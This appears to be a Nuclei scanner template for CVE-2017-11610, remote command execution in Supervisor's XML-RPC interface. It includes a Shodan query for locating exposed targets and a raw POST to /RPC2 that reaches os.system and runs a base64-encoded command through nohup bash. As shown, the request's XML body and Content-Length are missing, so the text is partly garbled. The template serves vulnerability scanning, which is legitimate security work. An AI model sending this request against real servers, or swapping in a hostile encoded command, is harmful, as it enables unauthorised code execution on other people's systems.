id: CVE-2017-11610
info:
name: Supervisor XMLRPC Exec (CVE-2017-11610)
author: notnotnotveg
severity: critical
reference:
- https://github.com/rapid7/metasploit-framework/blob/master/documentation/modules/exploit/linux/http/supervisor_xmlrpc_exec.md
- https://nvd.nist.gov/vuln/detail/CVE-2017-11610
description: Typically runs on port tcp/9001
tags: cve,cve2017,rce,supervisor
metadata:
shodan-query: 'http.title:"Supervisor Status"'
requests:
- payloads:
raw:
- |
POST /RPC2 HTTP/1.1
Host: {{Hostname}}
Accept: text/xml
Content-type: text/xml
Connection: close
Upgrade-Insecure-Requests: 1
Content-Length:
supervisor.supervisord.options.warnings.linecache.os.system
echo -n bHM= |base64 -d|nohup bash > /dev/null 2>&1 &
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- ""
part: body
- type: word
words:
- "0"
part: body